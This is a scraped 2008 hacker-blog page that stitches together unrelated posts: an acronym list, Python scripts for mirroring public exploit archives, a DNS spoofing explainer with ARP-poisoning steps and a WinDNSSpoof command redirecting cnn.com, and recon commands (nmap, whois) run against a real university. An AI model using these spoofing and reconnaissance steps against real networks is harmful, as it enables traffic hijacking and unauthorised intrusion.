C:\>net view \\Visit
System error 53 has occurred.
The network path was not found.
C:\>net view \\Scanned
System error 53 has occurred.
The network path was not found.
C:\>net view \\24/03/2008
System error 123 has occurred.
The filename, directory name, or volume label syntax is incorrect.
C:\>net view \\IP
System error 53 has occurred.
The network path was not found.
C:\>net view \\217.81.99.29
-

Edit the bat file to remove the first couple of lines or just ignore it and let it run.

c:\for /?

Brings up all the help info on the "for" command, I never knew about it until I started asking about how to do this, I was expecting someone to write a perl script or something, but this just goes to show there's still a lot to learn inside windows and all the little files that are within.

I hope you guys find this useful and a real time saver and look at new ways to use the for command.

Regards Joffa...

Computer Acronyms ,The List

Computer Acronyms ,The List

ADSL - Asymmetric Digital Subscriber Line
AGP - Accelerated Graphics Port
ALI - Acer Labs, Incorporated
ALU - Arithmetic Logic Unit
AMD - Advanced Micro Devices
APC - American Power Conversion
ASCII - American Standard Code for Information Interchange
ASIC - Application Specific Integrated Circuit
ASPI - Advanced SCSI Programming Interface
AT - Advanced Technology
ATI - ATI Technologies Inc.
ATX - Advanced Technology Extended

--- B ---
BFG - BFG Technologies
BIOS - Basic Input Output System
BNC - Barrel Nut Connector

--- C ---
CAS - Column Address Signal
CD - Compact Disk
CDR - Compact Disk Recorder
CDRW - Compact Disk Re-Writer
CD-ROM - Compact Disk - Read Only Memory
CFM - Cubic Feet per Minute (ft³/min)
CMOS - Complementary Metal Oxide Semiconductor
CPU - Central Processing Unit
CTX - CTX Technology Corporation (Committed to Excellence)

--- D ---

DDR - Double Data Rate
DDR-SDRAM - Double Data Rate - Synchronous Dynamic Random Access Memory
DFI - DFI Inc. (Design for Innovation)
DIMM - Dual Inline Memory Module
DRAM - Dynamic Random Access Memory
DPI - Dots Per Inch
DSL - See ADSL
DVD - Digital Versatile Disc
DVD-RAM - Digital Versatile Disk - Random Access Memory

--- E ---
ECC - Error Correction Code
ECS - Elitegroup Computer Systems
EDO - Extended Data Out
EEPROM - Electrically Erasable Programmable Read-Only Memory
EPROM - Erasable Programmable Read-Only Memory
EVGA - EVGA Corporation

--- F ---
FC-PGA - Flip Chip Pin Grid Array
FDC - Floppy Disk Controller
FDD - Floppy Disk Drive
FPS - Frame Per Second
FPU - Floating Point Unit
FSAA - Full Screen Anti-Aliasing
FS - For Sale
FSB - Front Side Bus

--- G ---
GB - Gigabytes
GBps - Gigabytes per second or Gigabits per second
GDI - Graphical Device Interface
GHz - GigaHertz

--- H ---
HDD - Hard Disk Drive
HIS - Hightech Information System Limited
HP - Hewlett-Packard Development Company
HSF - Heatsink-Fan

--- I ---
IBM - International Business Machines Corporation
IC - Integrated Circuit
IDE - Integrated Drive Electronics
IFS- Item for Sale
IRQ - Interrupt Request
ISA - Industry Standard Architecture
ISO - International Standards Organization

--- J ---
JBL - JBL (Jame B. Lansing) Speakers
JVC - JVC Company of America

- K ---
Kbps - Kilobits Per Second
KBps - KiloBytes per second

--- L ---
LG - LG Electronics
LAN - Local Area Network
LCD - Liquid Crystal Display
LDT - Lightning Data Transport
LED - Light Emitting Diode

--- M ---
MAC - Media Access Control
MB - MotherBoard or Megabyte
MBps - Megabytes Per Second
Mbps - Megabits Per Second or Megabits Per Second
MHz - MegaHertz
MIPS - Million Instructions Per Second
MMX - Multi-Media Extensions
MSI - Micro Star International

--- N ---
NAS - Network Attached Storage
NAT - Network Address Translation
NEC - NEC Corporation
NIC - Network Interface Card

--- O ---
OC - Overclock (Over Clock)
OCZ - OCZ Technology
OEM - Original Equipment Manufacturer

--- P ---
PC - Personal Computer
PCB - Printed Circuit Board
PCI - Peripheral Component Interconnect
PDA - Personal Digital Assistant
PCMCIA - Peripheral Component Microchannel Interconnect Architecture
PGA - Professional Graphics Array
PLD - Programmable Logic Device
PM - Private Message / Private Messaging
PnP - Plug 'n Play
PNY - PNY Technology
POST - Power On Self Test
PPPoA - Point-to-Point Protocol over ATM
PPPoE - Point-to-Point Protocol over Ethernet
PQI - PQI Corporation
PSU - Power Supply Unit

--- R ---
RAID - Redundant Array of Inexpensive Disks
RAM - Random Access Memory
RAMDAC - Random Access Memory Digital Analog Convertor
RDRAM - Rambus Dynamic Random Access Memory
ROM - Read Only Memory
RPM - Revolutions Per Minute

--- S ---
SASID - Self-scanned Amorphous Silicon Integrated Display
SCA - SCSI Configured Automatically
SCSI - Small Computer System Interface
SDRAM - Synchronous Dynamic Random Access Memory
SECC - Single Edge Contact Connector
SODIMM - Small Outline Dual Inline Memory Module
SPARC - Scalable Processor ArChitecture
SOHO - Small Office Home Office
SRAM - Static Random Access Memory
SSE - Streaming SIMD Extensions
SVGA - Super Video Graphics Array
S/PDIF - Sony/Philips Digital Interface

--- T ---
TB - Terabytes
TBps - Terabytes per second
Tbps - Terabits per second
TDK - TDK Electronics
TEC - Thermoelectric Cooler
TPC - TipidPC
TWAIN - Technology Without An Important Name

--- U ---
UART - Universal Asynchronous Receiver/Transmitter
USB - Universal Serial Bus
UTP - Unshielded Twisted Pair

--- V ---
VCD - Video CD
VPN - Virtual Private Network

--- W ---
WAN - Wide Area Network
WTB - Want to Buy
WYSIWYG - What You See Is What You Get

--- X ---
XGA - Extended Graphics Array
XFX - XFX Graphics, a Division of Pine
XMS - Extended Memory Specification
XT - Extended Technology

By d3hydr0

How to build a local exploit database.

How to build a local exploit database.
by d3hydr0 > http://darkcodecracker.blogspot.com/
Date: 03/07/08

In this tutorial I will show you several tools to create
your own local exploit database and how to search through
it. The 2 sites we will be using to gather exploits are
milw0rm and packetstorm. Well, first lets discuss why you
would need a local exploit database. Any answers? Here's mine,
because I can...

There are 3 scripts we will be using to create our database.
The first thing you need to decide is where you want your
exploits stored. Each script has a HOME_DIR option that needs
to be filled out according to your location (unless you like
/home/d3hydr8).

The first script will extract all exploits from packetstorm
from 2000-previous year. First, it will do a time check to
make sure the last year in the YEARS list is the previous year.

Years list:
YEARS = ["00","01","02","03","04","05","06","07"]

This is the first time I have used raw_input in one of my
scripts. It will show you the last year in the list and
the current year. Then ask you if this is correct. Like
shown below:


d3hydr8@linuxbox:~> python packext.py

[+] Checking Years

Last year: 07 Current Year: 08

Is this correct? Yes or No


Here is the c0de and a link:

http://www.darkc0de.com/misc/packext.py


#!/usr/bin/python
#This script will extract all exploits
#from packetstorm from 2000-previous year.

#http://darkc0de.com
#d3hydr8[at]gmail[dot]com

import urllib, tarfile, os, sys, time

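HOME_DIR = "/home/d3hydr8/"
YEARS = ["00","01","02","03","04","05","06","07"]


def safe_members(tar, dest):
    """Return the members of *tar* that are safe to extract under *dest*.

    The archive is fetched over plain HTTP with no integrity check, so its
    entry names are untrusted.  tarfile.extractall() honours "../" and
    absolute names as given, which would let an archive write outside the
    per-year directory.  Entries that resolve outside *dest*, plus hard
    links, symlinks and device nodes (whose targets are equally untrusted),
    are skipped with a notice instead.
    """
    root = os.path.realpath(dest)
    kept = []
    for member in tar.getmembers():
        if member.issym() or member.islnk() or member.isdev():
            print "[!] Skipping link/device entry:", member.name
            continue
        target = os.path.realpath(os.path.join(root, member.name))
        if target != root and not target.startswith(root + os.sep):
            print "[!] Skipping entry outside", dest + ":", member.name
            continue
        kept.append(member)
    return kept


#Time check: the last entry of YEARS must be a year that is already over,
#otherwise the yearly archive for it does not exist yet.
now = time.strftime("%Y", time.localtime())[2:]
print "\n[+] Checking Years\n"
if now == YEARS[-1]:
    print "[!] The last year in YEARS cannot be the present year.\n"
    sys.exit(1)
print "Last year:",YEARS[-1],"Current Year:",now
resp = raw_input("\nIs this correct? Yes or No ").strip().lower()
if resp == "no":
    print "\n[!] Modify YEARS list correctly.\n"
    sys.exit(1)
elif resp == "yes":
    print "\n[+] Starting extraction"
else:
    print "\nHUH?\n"
    sys.exit(1)

#Make sure HOME_DIR ends with a "/"
if not HOME_DIR.endswith("/"):
    HOME_DIR = HOME_DIR+"/"
print "[+] Dir:",HOME_DIR,"\n"

#Extraction process: one <HOME_DIR>/<yy>-exploits directory per year.
for year in YEARS:
    print "Start: 20"+year
    dest = HOME_DIR+year+"-exploits"
    if not os.path.isdir(dest):
        os.mkdir(dest)
    os.chdir(dest)
    #Unauthenticated download; the contents are treated as untrusted below.
    page = "http://packetstormsecurity.org/"+year+"12-exploits/20"+year+"-exploits.tgz"
    archive = "20"+year+"-exploits.tgz"
    urllib.urlretrieve(page, archive)

    tar = tarfile.open(archive)
    try:
        #Only members that stay inside dest are handed to extractall().
        tar.extractall(members=safe_members(tar, dest))
    finally:
        tar.close()

    os.remove(archive)
    print "Done: 20"+year

print "\n[++] Operation Complete\n"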


Here is what you should see when you're done:


d3hydr8@linuxbox:~> python packext.py

[+] Checking Years

Last year: 07 Current Year: 08

Is this correct? Yes or No Yes

[+] Starting extraction
[+] Dir: /home/d3hydr8/exploits/

Start: 2000
Done: 2000
Start: 2001
Done: 2001
Start: 2002
Done: 2002
Start: 2003
Done: 2003
Start: 2004
Done: 2004
Start: 2005
Done: 2005
Start: 2006
Done: 2006
Start: 2007
Done: 2007

[++] Operation Complete




Now that we have all of the exploits from packetstorm through the
previous year, let's use milw0rm to get an archive of remote ports
and platforms.

http://www.darkc0de.com/misc/milarchive.py


#!/usr/bin/python
#Extracts exploit archive for remote
#ports and platforms from milw0rm.

import urllib, tarfile, os

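HOME_DIR = "/home/d3hydr8/"


def safe_members(tar, dest):
    """Return the members of *tar* that are safe to extract under *dest*.

    The archive is fetched over plain HTTP with no integrity check, so its
    entry names are untrusted.  tarfile.extractall() honours "../" and
    absolute names as given, which would let an archive write outside
    HOME_DIR.  Entries that resolve outside *dest*, plus hard links,
    symlinks and device nodes, are skipped with a notice instead.
    """
    root = os.path.realpath(dest)
    kept = []
    for member in tar.getmembers():
        if member.issym() or member.islnk() or member.isdev():
            print "[!] Skipping link/device entry:", member.name
            continue
        target = os.path.realpath(os.path.join(root, member.name))
        if target != root and not target.startswith(root + os.sep):
            print "[!] Skipping entry outside", dest + ":", member.name
            continue
        kept.append(member)
    return kept


#Make sure HOME_DIR ends with a "/"
if not HOME_DIR.endswith("/"):
    HOME_DIR = HOME_DIR+"/"
print "\n[+] Dir:",HOME_DIR,"\n"

if not os.path.isdir(HOME_DIR):
    os.mkdir(HOME_DIR)
os.chdir(HOME_DIR)

print "[!] Downloading file..."
#Unauthenticated download; the contents are treated as untrusted below.
page = "http://www.milw0rm.com/sploits/milw0rm.tar.bz2"
archive = "milw0rm.tar.bz2"
urllib.urlretrieve(page, archive)
print "[!] Extracting files..."
tar = tarfile.open(archive)
try:
    #Only members that stay inside HOME_DIR are handed to extractall().
    tar.extractall(members=safe_members(tar, HOME_DIR))
finally:
    tar.close()
os.remove(archive)
print "\n[!] Operation Complete\n"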

#Or
#wget http://www.milw0rm.com/sploits/milw0rm.tar.bz2
#tar -xjvf milw0rm.tar.bz2
#rm milw0rm.tar.bz2
#:)


Output:

What this does is create a milw0rm folder with the
directories platforms and rports.

d3hydr8@linuxbox:~> python milarchive.py

[+] Dir: /home/d3hydr8/exploits/

[!] Downloading file...
[!] Extracting files...

[!] Operation Complete



So, now we have packetstorm, remote port and platforms
but what about webapp exploits? The script below will
help you collect all the webapp exploits from milw0rm.
It will go page by page collecting 30 exploits at a
time and write them to your HOME_DIR+/milw0rm/. The script will
finish once it has seen an empty exploit list three times.

Be careful with this tool and set your delays accordingly. Milw0rm
does have DDoS protection with automatic IP blocking.

http://www.darkc0de.com/misc/milwebappext.py


#!/usr/bin/python
#Attempts to collect all webapp
#exploits from milw0rms DB.

import urllib2, time, os, re, urllib

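HOME_DIR = "/home/d3hydr8/exploits"
site = "http://www.milw0rm.com/webapps.php?start="
#Time to wait between page loads (in secs)
TIME = "3"
#Number of empty (or failed) pages after which the run is considered done.
MAX_EMPTY = 3

#Make sure HOME_DIR ends with a "/"
if not HOME_DIR.endswith("/"):
    HOME_DIR = HOME_DIR+"/"
print "\n[+] Dir:",HOME_DIR,"\n"
HOME_DIR = HOME_DIR+"milw0rm/"

if not os.path.isdir(HOME_DIR):
    os.mkdir(HOME_DIR)
os.chdir(HOME_DIR)

#Walk the listing 30 entries per page until MAX_EMPTY pages yield nothing.
start = 0
error = 0
while error != MAX_EMPTY:
    time.sleep(int(TIME))
    print "[+] Page:",start
    try:
        #Plain GET: a second positional argument to urlopen() is sent as a
        #POST body, which is not what the listing page expects.
        source = urllib2.urlopen(site+str(start)).read()
    except(urllib2.URLError):
        #A failed page counts like an empty one so the loop still ends.
        xplts = []
    else:
        xplts = re.findall("href=\"/exploits/\d+",source)
        print "[+] Exploits Found:",len(xplts)
    for xplt in xplts:
        time.sleep(0.5)
        xplt = xplt.replace("href=\"","")
        #The regex only admits digits after /exploits/, so the basename used
        #below is a plain number and cannot point outside HOME_DIR.
        urllib.urlretrieve("http://www.milw0rm.com"+xplt, HOME_DIR+xplt.rsplit("/",1)[1])
    if not xplts:
        error +=1
    start +=30
print "\n[!] Operation Complete\n"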


Looking more closely at that c0de I'm guessing
you might be able to just change some site info
like exploits >> papers and collect all papers
(or whatever else).

This next script is just a utility for searching
for exploits from the command line from milw0rm.

http://www.darkc0de.com/misc/milsearch.py


#!/usr/bin/python
#Milw0rm exploits search tool.

import urllib2, re, sys

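import urllib

if len(sys.argv) != 2:
    print "\nUsage: ./milsearch.py [search]"
    print "Ex: ./milsearch.py phpmyadmin\n"
    sys.exit(1)

site = "http://www.milw0rm.com/search.php?dong="
#The term comes from the command line: quote it so spaces, "&" or "#"
#cannot break the query string or be read as extra parameters.
query = urllib.quote_plus(sys.argv[1])

try:
    #Plain GET: a second positional argument to urlopen() would be sent as
    #a POST body.
    source = urllib2.urlopen(site+query).read()
except(urllib2.URLError):
    #Treat a failed request as "no results" rather than crashing.
    xplts = []
else:
    xplts = re.findall("href=\"/exploits/\d+",source)
    print "\n[+] Results Found:",len(xplts),"\n"

if xplts:
    for xplt in xplts:
        print "http://milw0rm.com"+xplt.replace("href=\"","")
else:
    print "\nNo Results Found\n"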


Output:



Now you're thinking, "Ok, I have a database of exploits
but how would I keep it up to date?". The script
below will help with this task. It will check milw0rm
for new exploits and download them to your HOME_DIR
if found. The default time is set to check every 5
minutes.

http://www.darkc0de.com/misc/milupdate.py


#!/usr/bin/python
#Checks milw0rm.com for exploit updates.

import urllib2, time, os, re, urllib

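HOME_DIR = "/home/d3hydr8/exploits"
site = "http://www.milw0rm.com/"
#Time to wait for update checks (in secs)
TIME = "300"

#Make sure HOME_DIR ends with a "/"
if not HOME_DIR.endswith("/"):
    HOME_DIR = HOME_DIR+"/"
print "\n[+] Dir:",HOME_DIR,"\n"
HOME_DIR = HOME_DIR+"milw0rm/"

if not os.path.isdir(HOME_DIR):
    os.mkdir(HOME_DIR)
os.chdir(HOME_DIR)

#Exploit paths already fetched; a set keeps the membership test cheap as
#the collection grows over a long-running session.
done = set()
while 1:
    time.sleep(int(TIME))
    #Collected across every matching line of the front page, so links on
    #later lines no longer overwrite those found earlier.
    xplts = []
    try:
        #Plain GET: a second positional argument to urlopen() is sent as a
        #POST body.
        source = urllib2.urlopen(site).readlines()
    except(urllib2.URLError):
        #Network failure: nothing new this round, retry after TIME.
        pass
    else:
        for line in source:
            if re.search("class=\"style15", line):
                xplts.extend(re.findall("href=\"/exploits/\d+", line))
    for xplt in xplts:
        if xplt in done:
            continue
        done.add(xplt)
        path = xplt.replace("href=\"","")
        print "[+] Adding: http://www.milw0rm.com"+path
        #The regex only admits digits after /exploits/, so the basename is
        #a plain number and cannot point outside HOME_DIR.
        urllib.urlretrieve("http://www.milw0rm.com"+path, HOME_DIR+path.rsplit("/",1)[1])
    print "[+] Collected:",len(done),"exploits\n"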


If you haven't found an online module to search
through your exploits and bought the domain "exploits4fun.com"
there are a couple ways to search them. The first is use your
GUI search utility that comes with your OS. If using KDE's
Find Files/Folders just change your Name/Location to your
HOME_DIR and use the Contents tab to do the rest.



Or just use your find cmd. I hope this tutorial and tools
were fun. I realize this stuff is pretty much useless when
you could just visit the sites but I had fun writing it. And
remember, because I can...

XSS attacks

http://www.darkc0de.com/tutorials/XSS_attacks.pdf

Hey Wires Cracking Tutorial

http://orkutadminby.freehostia.com/DarkCodeCracker%20Files/Downloads/heywirescrktut.zip

What is DNS Spoofing?

What is DNS Spoofing ?


DNS spoofing is the art of making a DNS entry point to a different IP
address than the one it is supposed to point to. To understand better, let's see
an example.You're on your web browser and wish to see the news on
www.cnn.com, without to think of it, you just enter this URL in your
address bar and press enter.
Now, what's happening behind the scenes
? Well... basically, your browser is going to send a request to a DNS
Server to get the matching IP address for www.cnn.com, then the DNS
server tells your browser the IP address of CNN, so your browser to
connect to CNN's IP address and display the content of the main page.
Hold
on a minute... You get a message saying that CNN's web site has closed
because they don't have anymore money to pay for their web site. You're
so amazed, you call and tell that to your best friend on the phone, of
course he's laughing at you, but to be sure, he goes to CNN web site to
check by himself.
You are surprised when he tells you he can see the
news of the day as usual and you start to wonder what's going on. Are
you sure you are talking to the good IP address ?Let's check. You ask
your friend to fire up his favorite DNS resolving tool and to give you
the IP address he's getting for www.cnn.com.Once you got it, you put it
in your browser URL bar :

http://212.153.32.65

You feel ridiculous and frustrated when you see CNN's web page with its
daily news.
Well
you've just been the witness of a DNS hijacking scenario. You're
wondering what happened, did the DNS Server told you the wrong IP
address ? Maybe... At least this is the most obvious answer coming to
our mind.
In fact there are two techniques for accomplishing this DNS hijacking.
Let's see the first one, the "DNS ID Spoofing" technique.

1) DNS Cache Poisoning

As
you can imagine, a DNS server can't store information about all
existing names/IP on the net in its own memory space.That's why DNS
server have a cache, it enables them to keep a DNS record for a while.
In
fact, a DNS server only holds records for the machines of the domain
it is authoritative for; if it needs to know about machines outside its
domain, it has to send a request to the DNS server which handles those
machines, and since it doesn't want to ask every time about records,
it can store in its cache the replies returned by other DNS servers.
Now let's see how someone could poison the cache of our DNS Server.
An
attacker is running his own domain (attacker.net) with his own hacked
DNS server (ns.attacker.net). Note that I said hacked DNS server
because the attacker customized the records in his own DNS server, for
instance one record could be www.cnn.com=81.81.81.81
1) The attacker sends a request to your DNS Server asking it to resolve
www.attacker.net
2) Your DNS server is not aware of this machine's IP address; it doesn't
belong to its domain, so it needs to ask the responsible name
server.
3) The hacked DNS Server is replying to your DNS server,
and at the same time, giving all his records (including his record
concerning www.cnn.com) Note : this process is called a zone transfer.
4) The DNS server is not "poisoned".The attacker got his IP, but who
cares, his goal was not to get the IP address of his web server but to
force a zone transfer and make your DNS server poisoned as long as the
cache will not be cleared or updated.
5) Now if you ask your DNS
server, about www.cnn.com IP address it will give you 172.50.50.50,
where the attacker run his own web server. Or even simple, the attacker
could just run a bouncer forwarding all packets to the real web site
and vice versa,so you would see the real web site, but all your traffic
would be passing through the attacker's web site.

2) DNS ID Spoofing

We
saw that when a machine X wants to communicate with a machine Y, the
former always needs the latter IP address. However in most of cases, X
only has the name of Y, in that case, the DNS protocol is used to
resolve the name of Y into its IP address.
Therefore, a DNS request
is sent to a DNS Server declared at X, asking for the IP address of the
machine Y. Meanwhile, the machine X assigned a pseudo random
identification number to its request which should be present in the
answer from the DNS server.Then when the answer from the DNS server
will be received by X, it will just have to compare both numbers if
they're the same, in this case, the answer is taken as valid,otherwise
it will be simply ignored by X.
Is this concept safe? Not
completely. Anyone could lead an attack by getting this ID number. If
you're for example on LAN, someone who runs a sniffer could intercept
DNS requests on the fly, see the request ID number and send you a fake
reply with the correct ID number... but with the IP address of his
choice.Then, without to realize it, the machine X will be talking to
the IP of attacker's choice thinking it's Y.

By the way, the DNS
protocol relies on UDP for requests (TCP is used only for zone
transfers), which means that it is easy to send a packet coming from a
fake IP since there are no SYN/ACK numbers (Unlike TCP, UDP doesn't
provide a minimum of protection against IP spoofing).

Nevertheless, there are some limitations to accomplish this attack.
In
my example above, the attacker runs a sniffer, intercept the ID number
and replies to his victim with the same ID number and with a reply of
his choice.
In the other hand, even if the attacker intercepted your
request, it will be transmitted to the DNS Server anyway which will
also reply to the request(unless the attacker is blocking the request
at the gateway or carry out ARP cache poisoning which would make the
attack possible on a switched network by the way).
That means that
the attacker has to reply BEFORE the real DNS server, which means that
to succeed this attack, the attacker MUST be on the same LAN so to have
a very quick ping to your machine, and also to be able to capture your
packets.

Practical example ( for
testing purposes ONLY)
To see yourself how to hijack a connection from a machine on your local
area network,we can do the followings :
First step :Poison the ARP cache of the victim's machine (tools and explanations
for realizing this task can be found at http://www.arp-sk.org)
Second step :Now, outgoing packets of the target will be redirected to your host,but
you have to forward the traffic to the real gateway, this can be
achieved witha tool like Winroute Pro.
Third step :We then use WinDNSSpoof,
developed by valgasu (www.securiteinfo.org)
which isa tool that greatly help to carry out DNS ID Spoofing. (Before
to use this tool be sure you have the Winpcap library installed on your
machine, see http://winpcap.polito.it).We
run it in the cmd like :
wds -n www.cnn.com -i 123.123.123.123 -g 00-C0-26-DD-59-CF -v
This
will make www.cnn.com to point to 123.123.123.123 on the victim's
machine. 00-C0-26-DD-59-C being the MAC Address of the gateway or DNS
server.

8 linux commands for information gathering

8 Linux Commands for Information Gathering

by d3hydr0 > http://darkcodecracker.blogspot.com/
date: 12/19/07

1) dig

dig (domain information groper) is a flexible tool for interrogating DNS name
servers. It performs DNS lookups and displays the answers that are returned from
the name server(s) that were queried. Most DNS administrators use dig to
troubleshoot DNS problems because of its flexibility, ease of use and clarity of
output. Other lookup tools tend to have less functionality than dig.

---------------------------------------------------------------------

d3hydr8@linuxbox:~> dig google.com

; <<>> DiG 9.4.1-P1 <<>> google.com
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 8918
;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 4, ADDITIONAL: 4

;; QUESTION SECTION:
;google.com. IN A

;; ANSWER SECTION:
google.com. 58 IN A 64.233.187.99
google.com. 58 IN A 64.233.167.99
google.com. 58 IN A 72.14.207.99

;; AUTHORITY SECTION:
google.com. 345549 IN NS ns1.google.com.
google.com. 345549 IN NS ns2.google.com.
google.com. 345549 IN NS ns3.google.com.
google.com. 345549 IN NS ns4.google.com.

;; ADDITIONAL SECTION:
ns1.google.com. 345549 IN A 216.239.32.10
ns2.google.com. 345549 IN A 216.239.34.10
ns3.google.com. 345549 IN A 216.239.36.10
ns4.google.com. 345549 IN A 216.239.38.10

;; Query time: 12 msec
;; SERVER: 24.158.63.8#53(24.158.63.8)
;; WHEN: Sun Jan 6 09:21:53 2008
;; MSG SIZE rcvd: 212

---------------------------------------------------------------------

2) nslookup

Nslookup is a program to query Internet domain name servers.

Examples of issuing a simple query:

nslookup name

nslookup IP_address

nslookup name server

nslookup IP_address server

---------------------------------------------------------------------
d3hydr8@linuxbox:~> nslookup 72.14.207.99
Server: 24.173.63.8
Address: 24.173.63.8#53

Non-authoritative answer:
99.207.14.72.in-addr.arpa name = eh-in-f99.google.com.

Authoritative answers can be found from:
207.14.72.in-addr.arpa nameserver = ns3.google.com.
207.14.72.in-addr.arpa nameserver = ns4.google.com.
207.14.72.in-addr.arpa nameserver = ns1.google.com.
207.14.72.in-addr.arpa nameserver = ns2.google.com.
ns3.google.com internet address = 216.239.36.10
ns4.google.com internet address = 216.239.38.10
ns1.google.com internet address = 216.239.32.10
ns2.google.com internet address = 216.239.34.10

---------------------------------------------------------------------

3) host

host is a simple utility for performing DNS lookups. It is normally used to convert names to IP addresses and vice versa. When
no arguments or options are given, host prints a short summary of its command line arguments and options.

---------------------------------------------------------------------

d3hydr8@linuxbox:~> host google.com
google.com has address 64.233.167.99
google.com has address 72.14.207.99
google.com has address 64.233.187.99
google.com mail is handled by 10 smtp2.google.com.
google.com mail is handled by 10 smtp3.google.com.
google.com mail is handled by 10 smtp4.google.com.
google.com mail is handled by 10 smtp1.google.com.

---------------------------------------------------------------------

4) whois

whois searches for an object in a RFC 3912 database.

This version of the whois client tries to guess the right server to ask for the specified object. If no guess can be made it
will connect to whois.networksolutions.com for NIC handles or whois.arin.net for IPv4 addresses and network names.

---------------------------------------------------------------------

d3hydr8@linuxbox:~> whois syr.edu

Domain Name: SYR.EDU

Registrant:
Syracuse University
Room 200 Machinery Hall
Syracuse, NY 13244
UNITED STATES

Administrative Contact:
Susan Heeley
Senior Administrator
Syracuse University
IT Dept.
Center for Science and Technology
Syracuse, NY 13244
UNITED STATES
(315) 443-2716
sheeley@syr.edu

Technical Contact:

NISC
Syracuse University
Room 200 Machinery Hall
Syracuse, NY 13244
UNITED STATES
(315) 443-2677
nisc@syr.edu

Name Servers:
LURCH.CNS.SYR.EDU 128.230.12.5
ICARUS.SYR.EDU 128.230.1.49
SUEC1.SYR.EDU 209.164.131.32
NS3.BROADWING.NET
NS4.BROADWING.NET

Domain record activated: 02-Sep-1986
Domain record last updated: 11-Jul-2007
Domain expires: 31-Jul-2008

---------------------------------------------------------------------

5) nmap

* we all know this one

Nmap (“Network Mapper”) is an open source tool for network exploration and security auditing.

---------------------------------------------------------------------

linuxbox:/home/d3hydr8 # nmap -P0 -sS syr.edu

Starting Nmap 4.50 ( http://insecure.org ) at 2008-01-06 09:45 EST
Interesting ports on cwis01.syr.edu (128.230.18.35):
Not shown: 1656 closed ports, 49 filtered ports
PORT STATE SERVICE
80/tcp open http
4045/tcp open lockd
7937/tcp open nsrexecd
7938/tcp open lgtomapper
32771/tcp open sometimes-rpc5
32772/tcp open sometimes-rpc7

Nmap done: 1 IP address (1 host up) scanned in 215.657 seconds

---------------------------------------------------------------------

6) ping

ping uses the ICMP protocol's mandatory ECHO_REQUEST datagram to elicit an ICMP ECHO_RESPONSE from a host or gateway.
ECHO_REQUEST datagrams (``pings'') have an IP and ICMP header, followed by a struct timeval and then an arbitrary number of
``pad'' bytes used to fill out the packet.

---------------------------------------------------------------------

linuxbox:/home/d3hydr8 # ping -c 2 128.230.18.35
PING 128.230.18.35 (128.230.18.35) 56(84) bytes of data.
64 bytes from 128.230.18.35: icmp_seq=1 ttl=240 time=70.6 ms
64 bytes from 128.230.18.35: icmp_seq=2 ttl=240 time=69.6 ms

--- 128.230.18.35 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1000ms
rtt min/avg/max/mdev = 69.685/70.155/70.625/0.470 ms

---------------------------------------------------------------------

7) traceroute (mtr)

As mtr starts, it investigates the network connection between the host mtr runs on and HOSTNAME by sending packets with purposely
low TTLs. It continues to send packets with low TTL, noting the response time of the intervening routers. This allows mtr
to print the response percentage and response times of the internet route to HOSTNAME. A sudden increase in packetloss or
response time is often an indication of a bad (or simply overloaded) link.

---------------------------------------------------------------------

linuxbox:/home/d3hydr8 # traceroute 128.230.18.35
traceroute to 128.230.18.35 (128.230.18.35), 30 hops max, 40 byte packets
1 192.168.1.1 (192.168.1.1) 1.934 ms 1.855 ms 2.097 ms
2 10.114.0.1 (10.114.0.1) 10.197 ms 12.492 ms 15.662 ms
3 172.22.5.13 (172.22.5.13) 16.707 ms 16.737 ms 8.981 ms
4 172.22.5.69 (172.22.5.69) 8.570 ms 12.523 ms 12.354 ms
5 172.22.32.114 (172.22.32.114) 14.607 ms 21.783 ms 11.076 ms
6 172.22.32.106 (172.22.32.106) 14.286 ms 14.387 ms 14.173 ms
7 12.86.87.29 (12.86.87.29) 18.481 ms 21.724 ms 14.085 ms
8 tbr2.attga.ip.att.net (12.122.96.74) 36.853 ms 40.701 ms 41.588 ms
9 tbr1.dlstx.ip.att.net (12.122.2.89) 46.345 ms 44.641 ms 47.791 ms
10 ggr3.dlstx.ip.att.net (12.123.16.193) 45.555 ms 44.932 ms 44.856 ms
11 br2-a3120s2.attga.ip.att.net (192.205.33.206) 46.336 ms 45.324 ms 35.904 ms
12 66.192.240.226 (66.192.240.226) 64.172 ms 63.947 ms 109.761 ms
13 64-132-176-170.static.twtelecom.net (64.132.176.170) 74.404 ms 77.708 ms 78.053 ms
14 128.230.61.1 (128.230.61.1) 78.784 ms 76.568 ms 78.336 ms
15 c6509r-srv.syr.edu (128.230.61.58) 77.995 ms 78.127 ms 78.214 ms
16 cwis01.syr.edu (128.230.18.35) 78.310 ms 70.660 ms 74.593 ms

---------------------------------------------------------------------


8) telnet

The telnet command is used to communicate with another host using the TELNET protocol. If telnet is invoked without the host
argument, it enters command mode, indicated by its prompt (telnet>). In this mode, it accepts and executes the commands listed
below. If it is invoked with arguments, it performs an open command with those arguments.

---------------------------------------------------------------------

d3hydr8@linuxbox:~> telnet os.edu 21
Trying 209.34.161.32...
Connected to os.edu.
Escape character is '^]'.
220 FTP server...

---------------------------------------------------------------------

Installing Python in windows and running a script

Installing Python in Windows and Running a Script

by d3hydro > http://darkcodecracker.blogspot.com/

date: 12/30/07


Installing Python in Windows and Running a Script


1.) First thing you need to do is visit http://www.python.org/download/ and download the Windows installer.

Download Link: http://www.python.org/ftp/python/2.5.1/python-2.5.1.msi

2.) After downloading the install file, locate it, right click and choose Install

3.) The first window that shows up gives you the choice of who to install python for.

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtXiYdHh3Bj1hAZaSYrz16c6KP8N8wxlbltqbB7qn6pNGZKZXzbo7cxBMEU7wClLg2RFRRIXa6uk1VI1jzfwpF_oF82GtQqmQTaPtyNV0xn5xwQ2BsD3yZDDm8OrdWu_txlPVyXRp9fu4/s1600-h/1.jpg


4.) The second window is asking you where you would like python installed. Default
directory is C:\Python25\ but I have seen many people shorten it to C:\Py\ or C:\Python\.

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAnVENBi1tscP0nOnT8Mrb4WzubJpc19gw488tTXoqt7tOdOXfCsIZtq8d7c4bvYPP3Ip3Rov3U7hvUUgFUx9rvLsK-QEU-9L_ksybY0pJwIJyiAxvA_F-RP_YUDEeeC-FbmC2KV3uLiw/s1600-h/2.jpg

5) The third window is asking you how you would want python installed. You can
make your own judgements here but I suggest just clicking Next.

